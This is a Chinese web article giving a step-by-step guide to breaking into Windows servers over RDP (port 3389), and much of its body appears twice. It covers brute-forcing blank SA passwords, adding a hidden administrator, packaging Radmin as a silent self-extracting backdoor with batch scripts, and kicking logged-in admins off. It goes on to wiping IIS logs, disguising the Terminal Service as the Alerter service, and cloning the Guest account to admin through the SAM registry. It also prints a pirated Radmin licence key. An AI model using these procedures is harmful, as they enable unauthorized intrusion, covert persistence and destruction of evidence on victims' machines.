高手解析如何入侵3389
發(fā)布日期:2021-12-31 18:12 | 文章來(lái)源:腳本之家
工具:WINNTAutoAttack自動(dòng)攻擊器(掃漏洞);SQLTOOLS(SA空口令連接器);RAMDIN影子3.0中文版(遠(yuǎn)程控制程序)(RADMIN注冊(cè)碼:
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開(kāi)3389端口服務(wù)的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠(yuǎn)程桌面連接程序)。
一.掃到SA弱口令(自動(dòng)攻擊器)
二.用SQLTOOLS連上去建一個(gè)用戶
net start telnet
開(kāi)telnet服務(wù)
net user mint mint /add
添加用戶mint密碼為
mint net localgroup administrators mint /add
將帳號(hào)mint升級(jí)為管理員
三.上傳后門(mén)程序RAD.EXE(RADMIN服務(wù)端自解壓程序)
制作RAD.EXE過(guò)程:
1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地設(shè)置服務(wù)端(一定要生成);
設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成
3、導(dǎo)出注冊(cè)表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值為1.reg;
4、編寫(xiě)一個(gè)批處理,并命名為u.bat;
@echo offnet stop r_server
5、寫(xiě)第二個(gè)批處理,r.bat,內(nèi)容為:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包;
7、將Rad.rar制作成自解壓文件;
選擇Default.sfx的自釋放模塊-->>高級(jí)自釋放選項(xiàng)
-->>常規(guī)
釋放路徑:%systemroot%\\system32
安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成。
四.用RADMIN客服端連接
上傳文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,這個(gè)要把里面的WINNT改為Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上傳一個(gè)反彈后門(mén)RADMIN進(jìn)入TELNET。
運(yùn)行c:\\winnt\\3389.exe,重啟肉雞。
五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去
這里就有時(shí)會(huì)出現(xiàn)個(gè)問(wèn)題。
使用3389登陸,發(fā)現(xiàn)登陸用戶已滿,不用怕,我們把他踢出去。
telnet對(duì)方ip,發(fā)現(xiàn)需要 NTLM 身份驗(yàn)證。我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。
找到c:\\winnt\\system32\\cmd.exe 建立一個(gè)快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint,telnet對(duì)方ip,直接可以登陸對(duì)方電腦了。
使用命令:
c:\\query user (查看對(duì)方目前終端登陸狀況。)
運(yùn)行命令:
c:\\logoff 1(踢出去一個(gè)管理者)
再用c:\\query user檢查一便~~(這就是為什么不馬上用1.bat了)
六.連上后..在cmd下運(yùn)行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)
七.打SA空口令補(bǔ)丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗(yàn)證登陸
復(fù)制一下代碼:SELMIS
if exists (select * from dbo.sysobjects where id
= object_id(N\’[dbo].[xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO
按F5(運(yùn)行),關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次,退出(這是為了不留下記錄)。
八.改3389端口和服務(wù)名稱
修改服務(wù)器端的端口設(shè)置,注冊(cè)表有2個(gè)地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
第二個(gè)地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
要重啟系統(tǒng)才能用新端口連。(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)
導(dǎo)出3389服務(wù)的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的鍵值為mm.reg文件。編輯mm.reg文件,替換TermService為Alerter(錯(cuò)誤警告服務(wù)..別的服務(wù)也行) 。再把第十行的"Description"="(這里是服務(wù)說(shuō)明,改為你所換的服務(wù)說(shuō)明,這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級(jí)警報(bào)。)"第十一行的"DisplayName"="(這里是服務(wù)名稱,改為你所換的服務(wù)名稱,這里改為Alerter)。保存,再導(dǎo)入注冊(cè)表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(這里是從新定向Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫(xiě)A要大寫(xiě))
九.注消后(注消比直接關(guān)要好些)用Radmin重啟肉雞
十.使用被禁用的帳戶[Guest]登陸,刪除自己開(kāi)始建的帳號(hào)
1.使用psu.exe展開(kāi)注冊(cè)表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值。
如:psu –p regedit –i 157
將Guest克成管理員權(quán)限,克成管理員權(quán)限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類(lèi)型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個(gè)類(lèi)型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類(lèi)型值(找的方法一樣)。
導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應(yīng)的類(lèi)型值的數(shù)據(jù)),然后刪除Guest的配置。
2.查看計(jì)算機(jī)管理中帳戶列表,刷新這時(shí)候會(huì)出現(xiàn)錯(cuò)誤[找不到帳戶](跳過(guò)這步也行)。
3.將Guest的配置(二個(gè)REG文件導(dǎo)進(jìn)注冊(cè)表)。
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
net user Guest ****
[修改密碼]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]
5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用。
6.用Guest登陸后刪除自己建的帳號(hào)。
net user mint /del
整個(gè)過(guò)程結(jié)束。
最后最好把RADMIN的服務(wù)也改了,多留個(gè)后門(mén)多條路,呵呵。整個(gè)過(guò)程全部結(jié)束,這機(jī)子就真正變成你的肉雞了。
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開(kāi)3389端口服務(wù)的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠(yuǎn)程桌面連接程序)。
一.掃到SA弱口令(自動(dòng)攻擊器)
二.用SQLTOOLS連上去建一個(gè)用戶
net start telnet
開(kāi)telnet服務(wù)
net user mint mint /add
添加用戶mint密碼為
mint net localgroup administrators mint /add
將帳號(hào)mint升級(jí)為管理員
三.上傳后門(mén)程序RAD.EXE(RADMIN服務(wù)端自解壓程序)
制作RAD.EXE過(guò)程:
1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地設(shè)置服務(wù)端(一定要生成);
設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成
3、導(dǎo)出注冊(cè)表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值為1.reg;
4、編寫(xiě)一個(gè)批處理,并命名為u.bat;
@echo offnet stop r_server
5、寫(xiě)第二個(gè)批處理,r.bat,內(nèi)容為:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包;
7、將Rad.rar制作成自解壓文件;
選擇Default.sfx的自釋放模塊-->>高級(jí)自釋放選項(xiàng)
-->>常規(guī)
釋放路徑:%systemroot%\\system32
安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成。
四.用RADMIN客服端連接
上傳文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,這個(gè)要把里面的WINNT改為Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上傳一個(gè)反彈后門(mén)RADMIN進(jìn)入TELNET。
運(yùn)行c:\\winnt\\3389.exe,重啟肉雞。
五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去
這里就有時(shí)會(huì)出現(xiàn)個(gè)問(wèn)題。
使用3389登陸,發(fā)現(xiàn)登陸用戶已滿,不用怕,我們把他踢出去。
telnet對(duì)方ip,發(fā)現(xiàn)需要 NTLM 身份驗(yàn)證。我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。
找到c:\\winnt\\system32\\cmd.exe 建立一個(gè)快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint,telnet對(duì)方ip,直接可以登陸對(duì)方電腦了。
使用命令:
c:\\query user (查看對(duì)方目前終端登陸狀況。)
運(yùn)行命令:
c:\\logoff 1(踢出去一個(gè)管理者)
再用c:\\query user檢查一便~~(這就是為什么不馬上用1.bat了)
六.連上后..在cmd下運(yùn)行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)
七.打SA空口令補(bǔ)丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗(yàn)證登陸
復(fù)制一下代碼:SELMIS
if exists (select * from dbo.sysobjects where id
= object_id(N\’[dbo].[xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO
按F5(運(yùn)行),關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次,退出(這是為了不留下記錄)。
八.改3389端口和服務(wù)名稱
修改服務(wù)器端的端口設(shè)置,注冊(cè)表有2個(gè)地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
第二個(gè)地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默認(rèn)是3389,選擇10進(jìn)制,修改成所希望的端口,比如1314。
要重啟系統(tǒng)才能用新端口連。(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)
導(dǎo)出3389服務(wù)的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的鍵值為mm.reg文件。編輯mm.reg文件,替換TermService為Alerter(錯(cuò)誤警告服務(wù)..別的服務(wù)也行) 。再把第十行的"Description"="(這里是服務(wù)說(shuō)明,改為你所換的服務(wù)說(shuō)明,這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級(jí)警報(bào)。)"第十一行的"DisplayName"="(這里是服務(wù)名稱,改為你所換的服務(wù)名稱,這里改為Alerter)。保存,再導(dǎo)入注冊(cè)表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(這里是從新定向Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫(xiě)A要大寫(xiě))
九.注消后(注消比直接關(guān)要好些)用Radmin重啟肉雞
十.使用被禁用的帳戶[Guest]登陸,刪除自己開(kāi)始建的帳號(hào)
1.使用psu.exe展開(kāi)注冊(cè)表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值。
如:psu –p regedit –i 157
將Guest克成管理員權(quán)限,克成管理員權(quán)限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類(lèi)型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個(gè)類(lèi)型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類(lèi)型值(找的方法一樣)。
導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應(yīng)的類(lèi)型值的數(shù)據(jù)),然后刪除Guest的配置。
2.查看計(jì)算機(jī)管理中帳戶列表,刷新這時(shí)候會(huì)出現(xiàn)錯(cuò)誤[找不到帳戶](跳過(guò)這步也行)。
3.將Guest的配置(二個(gè)REG文件導(dǎo)進(jìn)注冊(cè)表)。
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
net user Guest ****
[修改密碼]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]
5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用。
6.用Guest登陸后刪除自己建的帳號(hào)。
net user mint /del
整個(gè)過(guò)程結(jié)束。
最后最好把RADMIN的服務(wù)也改了,多留個(gè)后門(mén)多條路,呵呵。整個(gè)過(guò)程全部結(jié)束,這機(jī)子就真正變成你的肉雞了。
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章